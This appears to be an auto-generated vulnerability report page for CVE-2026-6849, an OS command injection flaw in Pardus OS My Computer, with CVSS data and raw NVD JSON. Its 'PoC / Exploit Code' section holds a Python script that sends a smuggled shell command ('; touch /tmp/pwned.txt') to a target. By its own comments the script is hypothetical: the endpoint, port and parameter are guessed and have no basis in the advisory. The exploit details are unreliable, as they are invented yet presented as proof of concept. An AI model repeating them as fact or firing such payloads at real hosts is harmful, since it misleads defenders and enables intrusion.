Security Vulnerability Report
CVE-2026-6849 (CVSS 8.8, HIGH)

Published: 2026-04-29 16:16:28
Last Modified: 2026-04-29 21:13:31

Description

Improper neutralization of special elements used in an OS command ('OS command injection', CWE-78) vulnerability in TUBITAK BILGEM Software Technologies Research Institute Pardus OS My Computer allows OS command injection. This issue affects Pardus OS My Computer versions up to and including 0.7.5, i.e. all versions before 0.8.0.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No structured configuration (CPE) data available. Per the description, the affected product is Pardus OS My Computer <= 0.7.5 (before 0.8.0).

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# PoC for CVE-2026-6849 (Hypothetical)
# This script demonstrates how a malicious payload could be sent to trigger the OS command injection.
import requests


def exploit(target_ip):
    # The vulnerable endpoint might be part of the My Computer app service
    url = f"http://{target_ip}:8080/api/v1/system_info"
    # Payload designed to inject a command (e.g., creating a file)
    # Assuming the vulnerable parameter is 'path'
    # The semicolon (;) separates commands in Linux shell
    payload = "/valid/path; touch /tmp/pwned.txt #"
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36",
        "Content-Type": "application/json",
    }
    data = {"path": payload}
    try:
        response = requests.post(url, json=data, headers=headers, timeout=5)
        if response.status_code == 200:
            print("[+] Request sent successfully.")
            print("[+] Check if /tmp/pwned.txt exists on the target machine.")
        else:
            print(f"[-] Server returned status code: {response.status_code}")
    except Exception as e:
        print(f"[-] Error occurred: {e}")


if __name__ == "__main__":
    target = "192.168.1.100"  # Replace with actual target
    exploit(target)
```

References

https://www.usom.gov.tr/bildirim/tr-26-0131
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-6849",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-29T16:16:28.413",
    "lastModified": "2026-04-29T21:13:30.563",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Improper neutralization of special elements used in an OS command ('OS command injection') vulnerability in TUBITAK BILGEM Software Technologies Research Institute Pardus OS My Computer allows OS Command Injection.\n\nThis issue affects Pardus OS My Computer: from <=0.7.5 before 0.8.0."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-78"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.usom.gov.tr/bildirim/tr-26-0131",
        "source": "[email protected]"
      }
    ]
  }
}
```